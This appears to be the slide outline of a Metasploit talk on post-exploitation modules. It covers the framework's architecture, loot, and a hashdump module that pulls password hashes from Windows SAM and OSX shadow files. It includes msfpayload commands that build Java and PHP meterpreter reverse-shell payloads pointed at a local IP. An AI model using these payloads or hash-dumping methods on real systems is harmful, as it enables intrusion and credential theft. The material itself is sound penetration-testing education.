Outline
Metasploit overview
Metasploit Framework architecture (diagram): Libraries (Rex, MSF Core); Interfaces (Console, CLI, GUI & Armitage); Tools; Modules.
What are Metasploit modules?
Metasploit Framework architecture (diagram, with module types): Libraries (Rex, MSF Core); Interfaces (Console, CLI, GUI & Armitage); Tools; Modules (Exploit, Payload, Encoder, NOP, Auxiliary, Post).
Back in the day
Meterpreter scripts
Post
Keeping the good
Improving the not-so-good
Using post-exploitation modules
Three ways to run them
Railgun
Loot
• Pilfered data
• Can be anything, stored in a file
– Process listing
– Environment variables
• Usually not passwords (use Creds table for that)
Awesome Post Modules
• Hashdump
– Similar in function to the hashdump command
– Instead of injecting into lsass, just reads the registry
– Calculates everything necessary to pull hashes directly out of SAM
• There’s an OSX version now!
– Reads /var/db/shadow/hash/<user guid>
– Grabs SHA1, NT, and LM hashes
Third-party post-exploitation modules
Modules in the works
Where to put it…
Platform-agnostic payloads
Java
• msfpayload java/meterpreter/reverse_tcp LHOST=192.168.99.1 X > foo.jar
• msfpayload java/meterpreter/reverse_tcp LHOST=192.168.99.1 W > foo.war
PHP
• msfpayload php/meterpreter_reverse_tcp LHOST=192.168.99.1 R > foo.php
Commercial Feature Highlights
Commercial Feature Highlights: post-exploitation modules in Metasploit Pro/Express
Quick demos
Questions?
@egyp7
egypt@metasploit.com